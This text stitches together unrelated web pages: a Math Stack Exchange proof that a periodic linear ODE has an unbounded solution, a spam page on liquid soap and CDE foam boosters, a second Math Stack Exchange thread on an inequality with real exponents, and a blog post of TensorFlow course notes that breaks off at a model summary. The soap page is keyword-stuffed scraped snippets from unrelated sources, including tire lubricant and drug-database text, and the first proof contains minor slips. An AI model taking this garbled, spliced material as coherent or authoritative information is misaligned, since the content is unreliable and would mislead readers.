The math environment inserts given math material within the running text. $$...$$ and $...$ are synonyms. See Math formulas. | 2022-12-08 08:53:58 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9609887003898621, "perplexity": 11767.823596519587}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711286.17/warc/CC-MAIN-20221208082315-20221208112315-00864.warc.gz"} |
https://math.stackexchange.com/questions/2371993/showing-the-existence-of-an-unbounded-solution-to-a-periodic-system-of-ode | # Showing the existence of an unbounded solution to a periodic system of ODE
We consider the system $$\begin{pmatrix} x \\ y\\ z\end{pmatrix}' = \begin{pmatrix} \cos^4(t) && 0 && -\sin(2t) \\ \sin(4t) && \sin(t) && -4 \\ -\sin(5t) && 0 && -\cos(t) \end{pmatrix} \begin{pmatrix} x \\ y\\ z\end{pmatrix}.$$ I'd like to show it has at least one unbounded solution. Since it's $2\pi$-periodic, I can use Floquet theory. I know what I have to show is that it has a characteristic exponent $\lambda$ with positive real part, since then $e^{\lambda t}p(t)$ will be a solution to the ODE where $p(t)$ is a non-vanishing $2\pi$-periodic function. This solution will go to infinity as $t\to \infty$, hence will be unbounded.
The main issue is that I'm not sure how to compute the monodromy matrix. The matrix in the ODE doesn't look too nice, so I don't think I could compute a fundamental matrix directly. Any suggestions? Also, are there any standard tricks on how to find a monodromy matrix if a fundamental matrix is too hard to compute?
Liouville's Formula; I think this problem can be solved using Liouville's Formula, like this:
For the sake of brevity in $$\LaTeX$$, let us agree to denote the coefficient matrix in this problem by $$A(t)$$, thus:
$$A(t) = \begin{bmatrix} \cos^4(t) && 0 && -\sin(2t) \\ \sin(4t) && \sin(t) && -4 \\ -\sin(5t) && 0 && -\cos(t) \end{bmatrix}; \tag{1}$$
then if we set
$$\mathbf r(t) = \begin{pmatrix} x(t)\\ y(t)\\ z(t) \end{pmatrix}, \tag{2}$$
the differential equation in question becomes
$$\dot {\mathbf r} (t) = A(t) \mathbf r (t); \tag{3}$$
we consider in the usual manner a fundamental solution matrix $$X(t, t_0)$$ for (3); that is, $$X(t, t_0)$$ is a $$3 \times 3$$ matrix function of $$t$$ satisfying
$$\dot X(t, t_0) = A(t) X(t, t_0) \tag{4}$$
with
$$X(t_0, t_0) = I, \tag{5}$$
the $$3 \times 3$$ identity matrix. It will be noted that the columns of $$X(t, t_0)$$ are themselves solutions of (3), and that if
$$\mathbf r_0 = \begin{pmatrix} x_0 \\ y_0 \\ z_0 \end{pmatrix}, \tag{6}$$
then $$X(t, t_0)\mathbf r_0$$ is the unique solution to (3) with
$$\mathbf r(t_0) = \mathbf r_0, \tag{7}$$
since
$$\dfrac{d}{dt} (X(t, t_0)\mathbf r_0) = \dot X(t, t_0) \mathbf r_0 = (A(t)X(t, t_0)) \mathbf r_0 = A(t)(X(t, t_0) \mathbf r_0); \tag{8}$$
it follows that the matrix $$X(t, t_0)$$ encodes all essential information about the solution space of (3).
We consider the matrix $$X(t + 2\pi, t_0)$$; we have
$$\dot X(t + 2\pi, t_0) = A(t + 2\pi)X(t + 2\pi, t_0) = A(t)X(t + 2\pi, t_0), \tag{9}$$
since $$A(t)$$ is periodic of period $$2\pi$$: $$A(t + 2\pi) = A(t)$$; thus $$X(t + 2\pi, t_0)$$ satisfies the same differential equation as does $$X(t, t_0)$$, but with initial condition $$X(t_0 + 2\pi, t_0)$$. Since
$$X(t_0 + 2\pi, t_0) = IX(t_0 + 2\pi) = X(t_0, t_0)X(t_0 + 2\pi, t_0), \tag{10}$$
it follows from the linearity of (3), and the uniqueness of solutions that for any $$t \in \Bbb R$$ we have
$$X(t + 2\pi, t_0) = X(t, t_0)X(t_0 + 2\pi, t_0) ; \tag{11}$$
we see from (11) that further
$$X(t + 4\pi, t_0) = X(t, t_0)X(t_0 + 2\pi, t_0)X(t + 2\pi, t_0) = X(t, t_0)X^2(t + 2\pi, t_0) , \tag{12}$$
and from here a very simple induction, the completion of which is left to the reader, establishes
$$X(t + 2n\pi, t_0) = X(t, t_0)X^n(t_0 + 2\pi, t_0) , \tag{13}$$
for any positive $$n \in \Bbb Z$$. (13) indicates that the long-term growth of the solution matrix $$X(t, t_0)$$ is intimately tied in with the expansive/contractive properties of the matrix $$X(t_0 + 2\pi, t_0)$$. In particular, if $$X(t_0 + 2\pi, t_0)$$ has an eigenvalue $$\lambda$$ with $$\vert \lambda \vert > 1$$, and corresponding eigenvector $$\mathbf v$$, that is
$$X(t_0 + 2\pi, t_0)\mathbf v = \lambda \mathbf v \tag{14}$$
we find
$$X(t + 2n\pi, t_0) \mathbf v = X(t, t_0) X^n(t_0 + 2\pi, t_0)\mathbf v = X(t, t_0)\lambda^n \mathbf v = \lambda^n X(t, t_0) \mathbf v, \tag{15}$$
whence, since $$\vert \lambda \vert > 1$$, the solution $$X(t, t_0)\mathbf v$$ grows without bound as $$t \to \infty$$. We further observe that $$X(t, t_0)$$ is nonsingular for all $$t$$, and $$[t_0, t_0 + 2\pi]$$ is compact, so $$\Vert X(t, t_0) \mathbf v \Vert$$ is bounded below away from $$0$$ on $$[t_0, t_0 + 2\pi]$$ by some real $$\mu > 0$$:
$$\Vert X(t, t_0) \mathbf v \Vert > \mu > 0, \; t_0 \le t \le t_0 + 2\pi; \tag{16}$$
thus we affirm that $$\Vert X(t + 2n\pi, t_0)\mathbf v \Vert > \vert \lambda^n \vert \mu$$, which shows that $$\Vert X(t + 2n\pi, t_0)\mathbf v \Vert \to \infty$$ as $$n \to \infty$$ independently of $$t_0$$ or $$t$$; $$X(t, t_0)$$ is nonsingular since $$X(t_0, t_0) = I$$, and the columns of $$I$$ are linearly independent, and linear independence or dependence of solutions is preserved under the flow of a first-order linear ordinary differential equation.
The preceding discussion indicates that computation of the eigenvalues of $$X(t_0 + 2\pi, t_0)$$ may be decisive in determining the stability or instability of solutions to (3); however, it is in general a difficult task to explicitly solve (4) for $$X(t, t_0)$$, and hence equally challenging to find its eigenvalues. But in some cases, such as the present one, progress may be made via a less than direct route; such is it situation here.
If it were possible to evaluate $$\det X(t_0 + 2\pi, t_0)$$ and to show that $$\det X(t_0 + 2\pi, t_0) > 1$$, then we could affim that $$\vert \lambda \vert > 1$$ for at least one eigenvalue of $$X(t_0 + 2 \pi, t_0)$$ and hence conclude that the system (3) is unstable. Fortunately, for the present problem this is the case, thanks to Liouville's Formula.
Liouville's Formula asserts that, given a system such as (4), $$\det X(t_0 + 2\pi, t_0)$$ evolves according to the scalar differential equation
$$\dfrac{d \det X(t, t_0)}{dt} = \operatorname{Tr}(A) \det X(t, t_0), \tag{17}$$
which has an immediate solution, given that $$X(t_0, t_0) = I$$,
$$\det X(t, t_0) = \exp(\displaystyle \int_{t_0}^t \operatorname{Tr}(A(s))ds) \det X(t_0, t_0) = \exp(\displaystyle \int_{t_0}^t \operatorname{Tr}(A(s))ds); \tag{18}$$
we have
$$\operatorname{Tr}(A(t)) = \cos^4 t + \sin t - \cos t, \tag{19}$$
whence
$$\displaystyle \int_{t_0}^{t_0 + 2\pi} \operatorname{Tr}(A(s))ds = \int_{t_0}^{t_0 + 2\pi}\cos^4 s ds + \int_{t_0}^{t_0 + 2\pi}\sin s ds - \int_{t_0}^{t_0 + 2\pi}\cos s ds; \tag{20}$$
the last two integrals on the right of (20) vanish and we are left with
$$\displaystyle \int_{t_0}^{t_0 + 2\pi}\operatorname{Tr}(A(s))ds = \int_{t_0}^{t_0 + 2\pi}\cos^4 s ds; \tag{21}$$
we now refer to this MSE post where it is shown that
$$\cos^4 t = \dfrac{3 + 4 \cos(2t) + \cos(4t)}{8}, \tag{22}$$
whence
$$\displaystyle \int_{t_0}^{t_0 + 2\pi} \operatorname{Tr}(A(s))ds = \int_{t_0}^{t_0 + 2\pi} \dfrac{3}{8} ds + \dfrac{1}{2}\int_{t_0}^{t_0 + 2\pi}\cos(2s)ds + \dfrac{1}{2}\int_{t_0}^{t_0 + 2\pi}\cos(4s)ds$$ $$= \displaystyle \int_{t_0}^{t_0 + 2\pi} \dfrac{3}{8} ds = \dfrac{3\pi}{4}; \tag{23}$$
then by (18) we find
$$\det X(t_0 + 2\pi, t_0) = e^{3\pi / 4} > 1; \tag{24}$$
it now follows from (24) that $$X(t_0 + 2\pi, t_0)$$ has an eigenvalue $$\lambda$$ with $$\lambda > 1$$; hence the system (3) is in fact unstable, i.e., has at least one unbounded solution.
• Thank you! I didn't think to utilize the determinant to get a characteristic multiplier with magnitude larger than 1, definitely remembering that one. – Curious Jul 27 '17 at 7:44
• @Curious: no problemo! – Robert Lewis Jul 27 '17 at 15:00 | 2021-05-13 08:57:08 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 79, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9469825029373169, "perplexity": 112.90367117136523}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-21/segments/1620243990584.33/warc/CC-MAIN-20210513080742-20210513110742-00050.warc.gz"} |
https://www.pauladenblanken.nl/en3/what-is-the-purpose-of-cde-in-making-liwuid-saop.html | # what is the purpose of cde in making liwuid saop
Production Environment
COOPERATIVE PARTNER
How soap is made - material, manufacture, making, used ...- what is the purpose of cde in making liwuid saop ,The hot liquid soap may be then whipped to incorporate air. Cooling and finishing 3 The soap may be poured into molds and allowed to harden into a large slab. It may also be cooled in a special freezer. The slab is cut into smaller pieces of bar size, which are then stamped and wrapped.Soap IngredientsReady-made soap bases may contain or require preservatives. Ready-Made Soap Bases. Ready-made soap bases may have additional ingredients necessary to make the soap able to be melted down and poured into molds or as a preservative. They can be made as "true soap" or be based partially or completely on synthetic detergents. A note about ...
### How to Make Your Own Tire Changing Bead Lube | It Still Runs
Whether you work in a tire repair shop, or change a lot of tires from your home, having a good bead seal lubricant will make your life easier. A bead seal is the seal your tire makes when air forces it against your rim. It's what holds the air in your tire. Tire changing machines are used to break these beads and ...
### Soap and detergent - Raw materials | Britannica
Soap and detergent - Soap and detergent - Raw materials: Fatty alcohols are important raw materials for anionic synthetic detergents. Development of commercially feasible methods in the 1930s for obtaining these provided a great impetus to synthetic-detergent production. The first fatty alcohols used in production of synthetic detergents were derived from body oil of the sperm or bottlenose ...
### Dish Soap & Dishwashing Liquids | Dawn Dish Soap
Why Use Dawn Dish Soap? Not all dish soaps are created equal. Here are some reasons Dawn is the right choice, every time. America’s Best Selling Dish Soap. Provides up to 50% less scrubbing * Dawn is so versatile, it can be used to clean many other items around your home.
### How to make Transparent Soap - Bearchele
Transparent soap is basically partly soap and partly solvent. Sodium Hydroxide causes crystals to form in soap and that is why the soap becomes opaque, in order to make it transparent, you have to dissolve the soap in enough solvent to make the crystals so small that the the light will freely pass through the soap, which makes it look transparent.
### Make Your Own Castile Soap All-Purpose Cleaning Spray
A DIY castile soap spray is a multitasking green cleaner you can use to clean multiple indoor surfaces in your home. Because it's biodegradable, castile soap spray is also a good choice for cleaning outdoors, where you can rinse away the soap without worrying about harming plants or waterways.
### Soaps & Lotions | FDA
Lotions, soaps, and other cleansers may be regulated as cosmetics or as other product categories, depending on how they are intended to be used.
### BEGINNER’S GUIDE TO SOAPMAKING: COLD PROCESS - …
Here is a free beginner’s guide to the art and science of soap-making that includes a step-by-step guide through the basics of Cold Process, and in part two, a beginner’s Melt and Pour layering project. Plus, downloadable PDFs make these guides a handy take-anywhere tool!
### Mastering soap: CDEA: foam booster
These surfactants boost the lather and foam of skin and hair products. But many have accounted it to be dangerous to the skin. In my opinion, the latter statement is only true if high amounts of the danger-contributing ingredient are incorporated to the product.
### DIY Homemade Liquid Hand Soap - Live Simply
Super Versatile: You can make cleaning and body products with the same soap. Inexpensive: A 32-ounce bottle of castile soap will cost \$17.Yes, this is more expensive than a bottle of all-purpose cleaner, but it will last you for months! Castile soap is highly concentrated so a little bit goes a long way.
### Mastering soap: CDEA: foam booster
These surfactants boost the lather and foam of skin and hair products. But many have accounted it to be dangerous to the skin. In my opinion, the latter statement is only true if high amounts of the danger-contributing ingredient are incorporated to the product.
### Material, Manufacture, Making, Used, Processing
Soap is undoubtedly the oldest product to be produced specifically as a surfactant and in its many forms continues to play a major role today. Within this highly competitive market place soap is presented in a multitude of forms both solid and liquid. The soap industry in India is at …
### Safeguard (soap) Procter & Gamble Manufacturing Company
Drugsom provides accurate and independent information on more than 24,000 prescription drugs, over-the-counter medicines and natural products. This material is provided for educational purposes only and is not intended for medical advice, diagnosis or treatment. Data sources include IBM Watson Micromedex (updated 7 Dec 2020), Cerner Multum™ (updated 4 Dec 2020), ASHP (updated 3 Dec …
### Making Liquid Soap: Teacher Manual
remaining contaminates are all ingredients in soap making soap production the easiest way to capture the value of the glycerin. The following lab is designed to show how glycerin, from biodiesel made with KOH, can be turned into a liquid soap with a multitude of uses from hand soap to …
### How Saponification Makes Soap - ThoughtCo
Aug 02, 2018·The crude soap obtained from the saponification reaction contains sodium chloride, sodium hydroxide, and glycerol. These impurities are removed by boiling the crude soap curds in water and re-precipitating the soap with salt. After the purification process is repeated several times, the soap may be used as an inexpensive industrial cleanser.
### What Is Castile Soap? | Allrecipes
Hand wash dishes with pre-diluted Castile soap (1:10 ratio). Add ½ cup to 3 gallons of water for mopping. Make your own all-purpose cleaner by combining ¼ cup soap in a quart of water in a spray bottle. Make a fruit and veggie wash. Mix 1 tablespoon soap with water in a bowl. Dunk and swish produce in the mixture and rinse until clear.
### How Soap Works - ThoughtCo
Jul 19, 2019·How Soap Cleans . Soap is an excellent cleanser because of its ability to act as an emulsifying agent. An emulsifier is capable of dispersing one liquid into another immiscible liquid. This means that while oil (which attracts dirt) doesn't naturally mix with water, soap can suspend oil/dirt in such a way that it can be removed.
### Soapmaking Additive Chart – Lovin Soap Studio
Purpose How to Add to Soap; Coffee Grounds: 1 tablespoon per pound of oils, use more or less depending on desired amount of exfoliation: ... Adds hardness to soap, can make soap crumbly if you use too much: Add to oils before mixing in lye solution. My newest book! New eCourse! Soap…
### Saponification: Definition, Process & Reaction - Video ...
The equation for saponification in soap making provides a great example of how you can take a fat and alkali to produce soap. Just to note, in this equation, alkali and lye are the same thing.
### 12: Making Soap - Saponification (Experiment) - Chemistry ...
Liquid cooking oils originate from corn, peanuts, olives, soybeans, and many other plants. For making soap, all different types of fats and oils can be used – anything from lard to exotic tropical plant oils. Saponification Reactions: $\text{Fat} + \text{Lye} → \text{Soap} + \text{Glycerol}$
### PROFITABLE SMALL SCALE MANUFACTURE OF SOAPS & …
Final Soap Making SOAP FROM CRUDE SOAP STOCK Beginning Composition of Crude Soap Stock Characteristics of Soap Stock Manufacturing Method SOAP FROM MIXED FATTY ACID ... Metal Degreasing Liquid Detergent General Purpose Solvent Based Detergent Low Foaming Liquid Detergents Light Duty Liquid Detergent Lotion
### Ingredient - Formulations - Household products - FAQ
Dec 17, 2020·Recipes: How to make shampoo (2 in 1 - shampoo, anti dundruff shampoo, oily hair etc.) How to make conditioner How to make Hand Cream How to make bubble bath, foam bath How to make bath oils How to make Liquid hand soap How to make Shower gel How to make body lotion and more How to make more personal health care products - the recipes/formulae.
### How Soap Works - ThoughtCo
Jul 19, 2019·How Soap Cleans . Soap is an excellent cleanser because of its ability to act as an emulsifying agent. An emulsifier is capable of dispersing one liquid into another immiscible liquid. This means that while oil (which attracts dirt) doesn't naturally mix with water, soap can suspend oil/dirt in such a way that it can be removed.
### Saponification: Definition, Process & Reaction - Video ...
The equation for saponification in soap making provides a great example of how you can take a fat and alkali to produce soap. Just to note, in this equation, alkali and lye are the same thing.
### What makes soap foam? | HowStuffWorks
There are many different kinds of soap in the world and most of them have one major thing in common: They can make bubbles. When you amass a bunch of tiny bubbles together, we call it foam or lather.It doesn't matter if you're talking about bar soap, shampoo, dish soap or laundry detergent -- the same thing happens when you mix any of them with air and water. | 2022-08-14 07:07:13 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.19903086125850677, "perplexity": 6969.544374862334}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571996.63/warc/CC-MAIN-20220814052950-20220814082950-00381.warc.gz"} |
http://math.stackexchange.com/questions/54964/explanation-for-the-assumption-of-the-proof | # Explanation for the assumption of the proof
$(x+y)^r < x^r + y^r$ whenever $x$ and $y$ are positive real numbers and $r$ is a real number with $0 < r < 1$.
In the solution it says it is safe to assume that $x+y=1$. I don't see any reason why this is the case... Why is it safe to assume $x+y=1$? If so how does this help proving this statement?
Thanks!
-
Removed the (proof-theory) tag since it did not seem relevant. – Srivatsan Aug 1 '11 at 16:02
Added the inequality tag. Not convinced the discrete-mathematics tag is appropriate. – Gerry Myerson Aug 2 '11 at 3:45
It is safe because you can divide both sides of the inequality by $(x+y)^r$, then substitute $x'=\frac{x}{x+y}, y'=\frac{y}{x+y}$ and have the same inequality with $x'+y'=1$. It looks like it helps by making the LHS be $1$, but without seeing the proof it is hard to comment further on how it helps.
-
@Mayumi BTW in many places, such a step (divide by $(x+y)^r$, so that the $x+y$ term can be assumed to be $1$) will be called "normalization". For e.g., the book could also say "By suitable normalization, it is safe to assume that $x+y=1$". – Srivatsan Aug 1 '11 at 15:54
It helps because once the reduction to $x+y=1$ is done, one has just to check that the one-variable function $u(x)=x^r+(1-x)^r$ is such that $u(x)<1$ for every $x$ in $(0,1)$--and this is easy. – Did Aug 1 '11 at 16:02
When you divide both side of the inequality by $(x+y)^r$ = $1 < x^r + y^r / (x+y)^r$ how is this equal to 1 ? – Mayumi Aug 1 '11 at 16:30
@Mayumi: I just said it made the left side $1$. You are correct that the right side is greater than $1$ – Ross Millikan Aug 1 '11 at 16:50
Now that you know why we can assume that $x+y=1$, we will look at the problem in a slightly different way, which I hope will add a little to the understanding. We want to prove that $(x+y)^r <x^r+y^r$. Since everything is positive, this is equivalent to showing that the ratio $(x^r+y^r)/(x+y)^r$ is greater than $1$.
But notice that $$\frac{x^r+y^r}{(x+y)^r}=\frac{x^r}{(x+y)^r}+\frac{y^r}{(x+y)^r}=\left(\frac{x}{x+y}\right)^r + \left(\frac{y}{x+y}\right)^r.$$
Each of the numbers $x/(x+y)$ and $y/(x+y)$ is positive and less than $1$.
If $t$ is positive and less than $1$, and $r<1$, then $t^r>t$. Thus $$\left(\frac{x}{x+y}\right)^r >\frac{x}{x+y}\qquad\text{and}\qquad \left(\frac{y}{x+y}\right)^r>\frac{y}{x+y},$$ and therefore $$\left(\frac{x}{x+y}\right)^r + \left(\frac{y}{x+y}\right)^r>\frac{x}{x+y}+\frac{y}{x+y}=1,$$ which is what we needed to prove.
The fact that if $0<t<1$ and $r<1$, then $t^r>t$ is more or less needed to complete the proof that assumes that $x+y=1$, though there are also calculus approaches. Thus the two-variable approach is really no harder than the one-variable approach, but bypasses the potentially puzzling "without loss of generality" part.
Comment about setting $x+y=1$: Let $F(x,y)=(x+y)^r$, and $G(x,y)=x^r+y^r$. Note that $F(ax,ay)=(ax+ay)^r =a^r(x+y)^r=a^rF(x,y)$. Note also that $G(ax,ay)=a^rG(x,y)$. We say that each of the functions $F(x,y)$ and $G(x,y)$ is homogeneous of degree $r$. The notion extends easily to functions of more variables. Many of the famous inequalities involve homogeneous functions. A simple example is the Arithmetic Mean Geometric Mean Inequality in three variables, $$\frac{x+y+z}{3} \ge \sqrt[3]{xyz}$$ (if $x$, $y$, and $z$ are non-negative). In this example, the functions are homogeneous of degree $1$.
The fact that in our case, $F(x,y)$ and $G(x,y)$ are homogeneous of the same degree is the real reason that we can, without loss of generality, assume that $x+y$ is anything we like. For note that if $a$ is positive then $$F(ax,ay)<G(ax,ay)\qquad\text{iff}\qquad a^rF(x,y)<a^rG(x,y)\qquad\text{iff}\qquad F(x,y)<G(x,y).$$
If we have established the inequality whenever $x+y=1$, then by multiplying each of $x$ and $y$ by $c^{1/r}$, we can obtain the inequality for any $x,y$ such that $x+y=c$.
Comment about the $r$-th power: What do we mean when we write $t^r$, say for $t>0$? This is quite a bit more complicated than it looks. We have a clear understanding of what we mean by $t^2$, or $t^5$. After a while, we develop an understanding of what we mean by something like $t^{3/4}$. For there is a unique positive number such that $s^4=t$, and then we can define $t^{3/4}$ to be the $s^3$.
After a while, we can show that familiar the laws of exponents that worked for integer powers, also work for expressions of the form $x^{p/q}$, where $p$ and $q$ are integers.
However, what do we mean, for example, by $3^{\sqrt{2}}$? Certainly it is not $3$ multiplied by itself $\sqrt{2}$ times!
There are several approaches to our quandary. One is to note that $\sqrt{2}\approx 1.41421356$ and think of $3^{1.4}$, $3^{1.41}$, $3^{1.414}$, $3^{1.4142}$, and so on. All these make sense, because the exponents can be expressed as fractions. But, intuitively, these numbers are getting closer and closer to something, and we define $3^{\sqrt{2}}$ to be that something.
However, it is more efficient to first of all define the functions $e^x$ and $\ln x$, and then define $t^r$ as $e^{r\ln t}$. Then it is not hard to show that the familiar laws of exponents work for any real exponent $r$.
A Problem-Solving Comment: The original inequality had symmetry between $x$ and $y$. Specializing to the case $x+y=1$ lets us turn the problem into a one variable problem, though with a certain loss of symmetry. In this case, the gain is probably worth it, though this post really has tried to show that the same idea can be pushed through without breaking symmetry.
The gain in going to one variable is mainly psychological. Because of the way schooling in mathematics is done, we have seen one variable problems far more often than two variable problems. But in many situations, it is useful to preserve symmetry as long as possible.
-
Very interesting! Thanks! – Mayumi Aug 2 '11 at 5:07 | 2015-10-13 22:03:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9407746195793152, "perplexity": 109.74963851371386}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443738017788.94/warc/CC-MAIN-20151001222017-00053-ip-10-137-6-227.ec2.internal.warc.gz"} |
https://hubertwang.me/post/machinelearning/intro-to-tf-for-ai-ml-and-dl | # Hubert Wang
I am
Hubert Wang
Wechat Official Account
Find fun things here!
# Introduction to TensorFlow for AI, ML, and DL
I took the Coursera course called Introduction to TensorFlow for Artificial Intelligence, Machine Learning, and Deep Learning taught by Laurence Moroney when attending an Amazon internal guild learning section recently. Here are the notes of what I learnt from the course and also some thoughts that can help you decide whether to take the course.
## Week 1
Traditional Programming takes Rule + Data to output Answers, but Machine Learning learns Rules from Answers + Data.
TensorFlow practice: The NN contains a single layer with 1 neuron trained with SDG + MSE after 500 epochs using 6 data points generated by linear function y = 2x - 1 :
from tensorflow import keras
import numpy as np
# Define the model
model = keras.Sequential([keras.layers.Dense(units=1, input_shape=[1])])
model.compile(optimizer='sgd', loss='mean_squared_error')
# Data
xs = np.array([-1.0, 0.0, 1.0, 2.0, 3.0, 4.0], dtype=float)
ys = np.array([-3.0, -1.0, 1.0, 3.0, 5.0, 7.0], dtype=float)
# Train
model.fit(xs, ys, epochs=500)
# Predict
print(model.predict([10.0]))
What is epoch? An epoch is one complete presentation of the data set to be learned to a learning machine. Learning machines like feedforward neural nets that use iterativealgorithms often need many epochs during their learning phase. link
Also, this website, TensorFlow PlayGround, is very interesting to manually adjust NN structure and see the visualized hiddhen layer outputs and generated models. I feel good to have a direct feeling to see how a super large NN can easily overfitting the limited data. --> get more data!!! ;)
## Week 2
Train a NN on FashionMnist dataset. This is a 3 layers NN with 1 input layer, 1 hidden layer, and 1 fully connected layer for output. Try the Colab notebook here.
import tensorflow as tf
from tensorflow import keras
# Get Fashion-Mnist
mnist = keras.datasets.fashion_mnist
(train_imgs, train_labels), (test_imgs, test_labels) = mnist.load_data()
# Have a look at the data
import matplotlib.pyplot as plt
plt.imshow(train_imgs[0])
print(train_imgs[0])
print(train_labels[0])
# Normalization
train_imgs = train_imgs / 255.0
test_imgs = test_imgs / 255.0
# Define the model
model = keras.models.Sequential([keras.layers.Flatten(),
keras.layers.Dense(128, activation=tf.nn.relu, input_shape=(784, 1)),
keras.layers.Dense(10, activation=tf.nn.softmax)])
# Compile model
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# Train model
model.fit(train_imgs, train_labels, epochs=5)
# Test model
import numpy as np
plt.imshow(test_imgs[0])
print(model.predict(np.reshape(test_imgs[0], (1, 28, 28))))
model.evaluate(test_imgs, test_labels)
Qs:
1. What will happen when set the hidden layer's neurons number to 512?
• Training time increase, accuracy also increase
2. What will happen if you remove the Flatten() layer?
• Throw error, as (28, 28) input image cannot fit into input_shape of (784, 1)
3. What will happen if you add two more layers with 256 and 128 neurons?
• No significant impact as this complex NN overfitting the simple data.
4. What will happen if you remove the normalization?
• It becomes hard for NN to learn and you'll see big loss in the beginning
5. Can we do early stop in TensorFlow to prevent overfitting?
• Yes! See the example using callback below.
import tensorflow as tf
# Define callback function
class myCallback(tf.keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs={}):
if(logs.get('acc')>0.80):
print("\nReached 80% accuracy so cancelling training!")
self.model.stop_training = True
callbacks = myCallback()
mnist = tf.keras.datasets.fashion_mnist
(training_images, training_labels), (test_images, test_labels) = mnist.load_data()
training_images, test_images = training_images / 255.0, test_images / 255.0
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(512, activation=tf.nn.relu),
tf.keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy')
model.fit(training_images, training_labels, epochs=5, callbacks=[callbacks])
In addition, this website: ML Faireness by Google is interesting talking about bias in ML.
## Week 3
CNN for this week. The instructor introduced the convolution and pooling. They are corresponding to the Conv2D layer and MaxPooling2D layers in tf.keras. For details on how CNN works, check Convolutional Neural Networks (Course 4 of the Deep Learning Specialization)
Notebook for the codes below: Link in Colab or Link in GitHub.
import tensorflow as tf
print(tf.__version__)
mnist = tf.keras.datasets.fashion_mnist
(training_images, training_labels), (test_images, test_labels) = mnist.load_data()
training_images=training_images.reshape(60000, 28, 28, 1)
training_images=training_images / 255.0
test_images = test_images.reshape(10000, 28, 28, 1)
test_images=test_images/255.0
model = tf.keras.models.Sequential([
tf.keras.layers.Conv2D(64, (3,3), activation='relu', input_shape=(28, 28, 1)),
tf.keras.layers.MaxPooling2D(2, 2),
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.summary()
model.fit(training_images, training_labels, epochs=5)
test_loss = model.evaluate(test_images, test_labels)
Note that for the Conv layer Conv2D(64, (3, 3), activation='relu', input_shape=(28, 28, 1)), 64 means the number of filters (conv kernel), 3 x 3 is the size of conv kernel, and the input shape is 28 x 28 x 1, which represents: width x height x color depth. As all pictures in FashionMNIST are gray level with only one color channel from 1 to 255, the last dimension of the input shape should be 1.
Let's have a close look at the parameters by model.summary():
